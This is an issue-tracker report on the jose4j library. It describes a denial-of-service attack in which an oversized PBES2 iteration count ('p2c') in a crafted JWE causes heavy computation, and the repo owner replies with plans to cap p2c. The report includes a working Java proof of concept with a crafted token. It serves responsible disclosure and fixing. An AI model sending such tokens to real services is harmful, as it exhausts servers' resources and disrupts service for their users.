Dos Attack Via specifically crafted JWE

Issue #212 closed
Jesse Yang created an issue

Description

The JWE key management algorithms based on PBKDF2 require a JOSE Header Parameter called p2c (PBES2 Count). This parameter dictates the number of PBKDF2 iterations needed to derive a CEK wrapping key. Its primary purpose is to intentionally slow down the key derivation function, making password brute-force and dictionary attacks more resource-intensive.

Therefore, if an attacker sets the p2c parameter in JWE to a very large number, it can cause a lot of computational consumption, resulting in a DOS attack

POC

import org.jose4j.jwa.AlgorithmConstraints;
import org.jose4j.jwe.ContentEncryptionAlgorithmIdentifiers;
import org.jose4j.jwe.JsonWebEncryption;
import org.jose4j.jwe.KeyManagementAlgorithmIdentifiers;
import org.jose4j.keys.AesKey;
import org.jose4j.lang.ByteUtil;

import java.security.Key;

public class jwt {
    public static void main(String[] argc)throws Exception{
        Key key = new AesKey(ByteUtil.randomBytes(16));
        JsonWebEncryption jwe = new JsonWebEncryption();
        jwe.setAlgorithmConstraints(new AlgorithmConstraints(AlgorithmConstraints.ConstraintType.PERMIT,
                KeyManagementAlgorithmIdentifiers.PBES2_HS256_A128KW));
        jwe.setContentEncryptionAlgorithmConstraints(new AlgorithmConstraints(AlgorithmConstraints.ConstraintType.PERMIT,
                ContentEncryptionAlgorithmIdentifiers.AES_128_CBC_HMAC_SHA_256));
        jwe.setKey(key);
        jwe.setCompactSerialization("eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJjIjoyMDAwMDAwMDAwLCJwMnMiOiJ1RWxQUGhJLThGY2h3a1BhIn0=.JOIw8ccIdkor7-ZaHQz6pUkqj2VEL_XIuonOwdSrdeXxFb7qN8FZKw.1-ZgAG8KzCbl6wDjUzrsTw.0pLJ0ZEu9OMYV1jyfPIrqg.gFNkCEwB1lf_Jovc7ZOd5w");
        System.out.println("Payload: " + jwe.getPayload());
    }
}

Recommendations

Set an upper limit for p2c, e.g. 100000.

Comments (4)

  1. Brian Campbell repo owner
    • changed status to open

    Thanks for raising this Jesse. I actually looked into this some a while back after this talk/white-paper[1] came out. The few production applications that I had access to were all using JWE AlgorithmConstraints such that they wouldn't even process a PBES2 JWE. So it didn't seem real urgent and I put it on the back burner intending to address it later. But honestly then sort of forgot about it. So thanks for bringing it back into the attention queue. The library should have some better default protections. Like a max p2c but also adding the PBES2 algs to default JWE AlgorithmConstraints to be blocked.

    [1] https://i.blackhat.com/BH-US-23/Presentations/US-23-Tervoort-Three-New-Attacks-Against-JSON-Web-Tokens.pdf

    https://i.blackhat.com/BH-US-23/Presentations/US-23-Tervoort-Three-New-Attacks-Against-JSON-Web-Tokens-whitepaper.pdf

  2. Log in to comment